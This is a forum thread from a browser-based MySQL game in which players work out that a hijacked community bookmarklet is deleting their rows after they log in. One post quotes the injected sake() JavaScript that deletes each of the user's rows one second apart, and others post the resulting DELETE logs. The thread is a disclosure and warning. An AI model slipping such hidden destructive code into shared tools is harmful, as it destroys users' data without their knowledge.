Problem on Shard1 ?
40 views
Skip to first unread message
Nicolas
Oct 14, 2009, 7:57:07 PM10/14/09
to mysqlgame
Just noticed that some of my rows, spanning from 8450 to 8460,
disappeared today :/ Some of my lines are still there though (8461 to
8468).
Is there some kind of problem with Shard1's data, or something going
on ?
Nicolas
disappeared today :/ Some of my lines are still there though (8461 to
8468).
Is there some kind of problem with Shard1's data, or something going
on ?
Nicolas
Trohs
Oct 17, 2009, 9:33:13 PM10/17/09
to mysqlgame
I had an enormous problem.
I lost all my rows (except one). I really don't know what happened, I
didn't gave any order, it happened just after I log in.
First of all, I want my rows back (don't really know if it is
possible); secondly, I would like to know what the function sake()
makes on the bookmarklet code.
I lost all my rows (except one). I really don't know what happened, I
didn't gave any order, it happened just after I log in.
First of all, I want my rows back (don't really know if it is
possible); secondly, I would like to know what the function sake()
makes on the bookmarklet code.
Trohs
Oct 17, 2009, 9:41:08 PM10/17/09
to mysqlgame
BTW, I used to own rows 18, 52, 55, 145, 200 (my first row), 201, 202,
203, 204, 206, 207, 208, 209, 237, 641, 642, 643, 916, 929, 943, 1296
on shard 2. Now I have just row 1297.
Other thing: I lost them all of a sudden, it wasn't hacking. I really
belive it was the bookmarklet code.
http://mysqlgame-ui-update.googlecode.com/svn/trunk/BrianUiUpdate.js
203, 204, 206, 207, 208, 209, 237, 641, 642, 643, 916, 929, 943, 1296
on shard 2. Now I have just row 1297.
Other thing: I lost them all of a sudden, it wasn't hacking. I really
belive it was the bookmarklet code.
http://mysqlgame-ui-update.googlecode.com/svn/trunk/BrianUiUpdate.js
Dolithe
Oct 18, 2009, 12:19:31 AM10/18/09
to mysqlgame
function sake(){
var rows = getMyRows();
var calls = [];
for(var i = 0; i < rows.length; i++){
calls.push(function(){ $.post("/update/queries",
{row_id: rows[i], "query":"DeleteCurrentRow","submit": "go"});
}
var sec = 1;
for(var i = 0; i < calls.length; i++){
var fn = calls[i];
setTimeout(fn, sec * (i+1) * 1000);
}
}
Added in checkin r84 by jesscold on Oct 14/2009... looks like it does
indeed delete rows some time after logging in, slowly, by putting a
delay between row deletions....
var rows = getMyRows();
var calls = [];
for(var i = 0; i < rows.length; i++){
calls.push(function(){ $.post("/update/queries",
{row_id: rows[i], "query":"DeleteCurrentRow","submit": "go"});
}
var sec = 1;
for(var i = 0; i < calls.length; i++){
var fn = calls[i];
setTimeout(fn, sec * (i+1) * 1000);
}
}
Added in checkin r84 by jesscold on Oct 14/2009... looks like it does
indeed delete rows some time after logging in, slowly, by putting a
delay between row deletions....
timlash
Oct 18, 2009, 12:00:59 PM10/18/09
to mysqlgame
I'd like to congratulate whomever is going by the name jesscold upon
achieving true Shit-Head status. Your mother must be proud.
Since realizing this exact problem was a real possibility as pointed
out to me by mook:
http://groups.google.com/group/mysqlgame/browse_thread/thread/294c55b5b801ad98
I've been hosting my own copy of of version 2.4 of the bookmarklet.
I've created a new Google code project to support this old version:
http://code.google.com/p/mysqlgame-safe-ui/
Update your bookmarklets to point to this new project. I have no
plans to further update this bookmarklet, but I will try to maintain
ownership of this project to keep malicious code out. The best
defense is to host a version of this yourself. Not sure how jesscold
was able to gain ownership of the mysqlgame-ui-update project in order
to insert the sake() function.
achieving true Shit-Head status. Your mother must be proud.
Since realizing this exact problem was a real possibility as pointed
out to me by mook:
http://groups.google.com/group/mysqlgame/browse_thread/thread/294c55b5b801ad98
I've been hosting my own copy of of version 2.4 of the bookmarklet.
I've created a new Google code project to support this old version:
http://code.google.com/p/mysqlgame-safe-ui/
Update your bookmarklets to point to this new project. I have no
plans to further update this bookmarklet, but I will try to maintain
ownership of this project to keep malicious code out. The best
defense is to host a version of this yourself. Not sure how jesscold
was able to gain ownership of the mysqlgame-ui-update project in order
to insert the sake() function.
Trohs
Oct 18, 2009, 1:26:49 PM10/18/09
to mysqlgame
http://www.flickr.com/photos/leovailati/4022322029/
According to the screenshot I took right after I realized what
happened, there was an one second delay between the deletions.
According to the screenshot I took right after I realized what
happened, there was an one second delay between the deletions.
Rylos
Oct 18, 2009, 8:59:25 PM10/18/09
to mysqlgame
Yep. got me too.
Today 00:56:56 DELETE FROM rows WHERE row_id=459 0.083
Today 00:56:55 DELETE FROM rows WHERE row_id=458 0.087
Today 00:56:54 DELETE FROM rows WHERE row_id=219 0.083
Today 00:56:53 DELETE FROM rows WHERE row_id=217 0.126
Today 00:56:52 DELETE FROM rows WHERE row_id=215 0.327
Today 00:56:51 DELETE FROM rows WHERE row_id=39 0.112
Today 00:56:50 DELETE FROM rows WHERE row_id=218 0.189
Today 00:56:56 DELETE FROM rows WHERE row_id=459 0.083
Today 00:56:55 DELETE FROM rows WHERE row_id=458 0.087
Today 00:56:54 DELETE FROM rows WHERE row_id=219 0.083
Today 00:56:53 DELETE FROM rows WHERE row_id=217 0.126
Today 00:56:52 DELETE FROM rows WHERE row_id=215 0.327
Today 00:56:51 DELETE FROM rows WHERE row_id=39 0.112
Today 00:56:50 DELETE FROM rows WHERE row_id=218 0.189
Trohs
Oct 18, 2009, 10:11:34 PM10/18/09
to mysqlgame
Where are the admins? We want our rows back.
This was clearly not our fault. Bookmarklet is legal, rigth? I can't
verify its code everytime I want to use it.
Also, please ban this jesscold from the game (if that is possible).
Sun 01:09:39 DELETE FROM rows WHERE row_id=1296
Sun 01:09:38 DELETE FROM rows WHERE row_id=943
Sun 01:09:37 DELETE FROM rows WHERE row_id=929
Sun 01:09:36 DELETE FROM rows WHERE row_id=916
Sun 01:09:35 DELETE FROM rows WHERE row_id=643
Sun 01:09:34 DELETE FROM rows WHERE row_id=642
Sun 01:09:33 DELETE FROM rows WHERE row_id=641
Sun 01:09:32 DELETE FROM rows WHERE row_id=237
Sun 01:09:31 DELETE FROM rows WHERE row_id=209
Sun 01:09:30 DELETE FROM rows WHERE row_id=208
Sun 01:09:29 DELETE FROM rows WHERE row_id=207
Sun 01:09:28 DELETE FROM rows WHERE row_id=206
Sun 01:09:27 DELETE FROM rows WHERE row_id=204
Sun 01:09:27 DELETE FROM rows WHERE row_id=203
Sun 01:09:25 DELETE FROM rows WHERE row_id=202
Sun 01:09:24 DELETE FROM rows WHERE row_id=201
Sun 01:09:23 DELETE FROM rows WHERE row_id=145
Sun 01:09:22 DELETE FROM rows WHERE row_id=55
Sun 01:09:21 DELETE FROM rows WHERE row_id=52
Sun 01:09:20 DELETE FROM rows WHERE row_id=18
Sun 01:09:19 DELETE FROM rows WHERE row_id=200
This was clearly not our fault. Bookmarklet is legal, rigth? I can't
verify its code everytime I want to use it.
Also, please ban this jesscold from the game (if that is possible).
Sun 01:09:39 DELETE FROM rows WHERE row_id=1296
Sun 01:09:38 DELETE FROM rows WHERE row_id=943
Sun 01:09:37 DELETE FROM rows WHERE row_id=929
Sun 01:09:36 DELETE FROM rows WHERE row_id=916
Sun 01:09:35 DELETE FROM rows WHERE row_id=643
Sun 01:09:34 DELETE FROM rows WHERE row_id=642
Sun 01:09:33 DELETE FROM rows WHERE row_id=641
Sun 01:09:32 DELETE FROM rows WHERE row_id=237
Sun 01:09:31 DELETE FROM rows WHERE row_id=209
Sun 01:09:30 DELETE FROM rows WHERE row_id=208
Sun 01:09:29 DELETE FROM rows WHERE row_id=207
Sun 01:09:28 DELETE FROM rows WHERE row_id=206
Sun 01:09:27 DELETE FROM rows WHERE row_id=204
Sun 01:09:27 DELETE FROM rows WHERE row_id=203
Sun 01:09:25 DELETE FROM rows WHERE row_id=202
Sun 01:09:24 DELETE FROM rows WHERE row_id=201
Sun 01:09:23 DELETE FROM rows WHERE row_id=145
Sun 01:09:22 DELETE FROM rows WHERE row_id=55
Sun 01:09:21 DELETE FROM rows WHERE row_id=52
Sun 01:09:20 DELETE FROM rows WHERE row_id=18
Sun 01:09:19 DELETE FROM rows WHERE row_id=200
Rylos
Oct 19, 2009, 10:14:41 PM10/19/09
to mysqlgame
I am sorry to say it's our own fault and I doubt they will do
anything. It was no big deal for me but to see you lose your rows
trohs just pisses me off. You've been super active and a much more
advanced player than I was.
I am only glad that I didn't start increasing my row count like I had
planned.
anything. It was no big deal for me but to see you lose your rows
trohs just pisses me off. You've been super active and a much more
advanced player than I was.
I am only glad that I didn't start increasing my row count like I had
planned.
Rylos
Oct 19, 2009, 10:19:06 PM10/19/09
to mysqlgame
Sow how exactly did this asshat take over the project and screw us
over?
over?
timlash
Oct 20, 2009, 12:02:41 AM10/20/09
to mysqlgame
Three ways are most likely, and I listed them in order of likelihood.
Either,
1) jesscold is a pseudonym for a former contributor or owner to the
original project who knew the project's password.
2) He wasn't related to anyone associated with the original project,
but used or discovered a weakness with GoogleCode repository like the
example below:
http://www.h-online.com/newsticker/news/item/Password-theft-via-vulnerability-in-Google-code-734815.html
or
3) He used a brute force trial and error attack to discover the
password and then took ownership of the project. This would entail
trying each one of 107,518,933,731 password possibilities (based on a
random 12 digit camel cased alpha-numeric password like the one Google
generated for the new project I created, or 461,738,052,776
possibilities if Google allows repeating characters in the same
password) until access was granted. Google will not allow you to
choose a password, but project owners can generate another random one
at any time.
Option 1 is far and away the most probable explanation. The
vulnerability described in the link was supposedly patched by Google
and I would think Google's security protocols are better than most. A
brute force attack would take a loooooong time or phenomenal luck.
Unfortunately, we'll probably never know.
Either,
1) jesscold is a pseudonym for a former contributor or owner to the
original project who knew the project's password.
2) He wasn't related to anyone associated with the original project,
but used or discovered a weakness with GoogleCode repository like the
example below:
http://www.h-online.com/newsticker/news/item/Password-theft-via-vulnerability-in-Google-code-734815.html
or
3) He used a brute force trial and error attack to discover the
password and then took ownership of the project. This would entail
trying each one of 107,518,933,731 password possibilities (based on a
random 12 digit camel cased alpha-numeric password like the one Google
generated for the new project I created, or 461,738,052,776
possibilities if Google allows repeating characters in the same
password) until access was granted. Google will not allow you to
choose a password, but project owners can generate another random one
at any time.
Option 1 is far and away the most probable explanation. The
vulnerability described in the link was supposedly patched by Google
and I would think Google's security protocols are better than most. A
brute force attack would take a loooooong time or phenomenal luck.
Unfortunately, we'll probably never know.
Trohs
Oct 20, 2009, 4:54:22 PM10/20/09
to mysqlgame
Yep, I guess you're rigth. Sorry about the irrational revolt moments
=D
In my perceive, this game was basically offline (I was alone in shard
2), there should be at least 100 active players on each shard to the
game accomplish the fun I was expecting.
Anyway, the idea of a MMO without any background, just rows on a mysql
table is phenomenal (geeky too). Unfortunately, the blogosphere buzz
didn't last long and soon people discovered that playing the game was
not easy at all. This, culminated with the disappearance of the devs,
made the game empty and boring.
I kept playing until now because I didn't want to loose all my work
(one year ago I logged in twice a day to see my rows, my precious rows
=D).
Having now no reasons to keep playing, I say goodbye and good luck for
those who stay.
I guess it didn't happen the way I thought it would.
=D
In my perceive, this game was basically offline (I was alone in shard
2), there should be at least 100 active players on each shard to the
game accomplish the fun I was expecting.
Anyway, the idea of a MMO without any background, just rows on a mysql
table is phenomenal (geeky too). Unfortunately, the blogosphere buzz
didn't last long and soon people discovered that playing the game was
not easy at all. This, culminated with the disappearance of the devs,
made the game empty and boring.
I kept playing until now because I didn't want to loose all my work
(one year ago I logged in twice a day to see my rows, my precious rows
=D).
Having now no reasons to keep playing, I say goodbye and good luck for
those who stay.
I guess it didn't happen the way I thought it would.
Reply all
Reply to author
Forward
0 new messages